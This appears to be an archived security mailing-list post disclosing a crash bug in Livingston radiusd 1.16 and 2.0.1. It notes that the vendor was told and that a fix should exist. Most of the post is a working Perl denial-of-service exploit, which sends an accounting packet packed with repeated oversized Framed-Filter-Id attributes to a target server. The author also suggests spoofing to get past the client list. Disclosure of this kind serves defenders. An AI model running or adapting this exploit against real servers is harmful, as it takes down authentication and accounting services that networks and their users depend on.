--35897.31267.41812
Content-Type: text/plain
Hi all
the following will crash radiusd from livingston, 1.16 and 2.0.1 97/5/22 (the
latest version)
i alerted livingston a few months ago ... a bugfix should be available now
one important thing is that you dont need the shared secret between the radius
server and its clients to be able to crash it, since the accounting server
will try to log the accounting request (though it will flag it as unverified)
of course you need to be listed in the clients config file to be able to send an accounting request. otherwise spoof ;)
--hamdi
#!/usr/bin/perl
use Authen::RadiusAcct;
$r = new Authen::RadiusAcct(Host => 'your.radius.server:1646', Secret => 'any_string');
$r->load_dictionary;
$r->add_attributes(
{Name => 'User-Name', Value => 'anyuser'},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')},
);
$r->send_packet(4);
}
--35897.31267.41812--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:49:16 PDT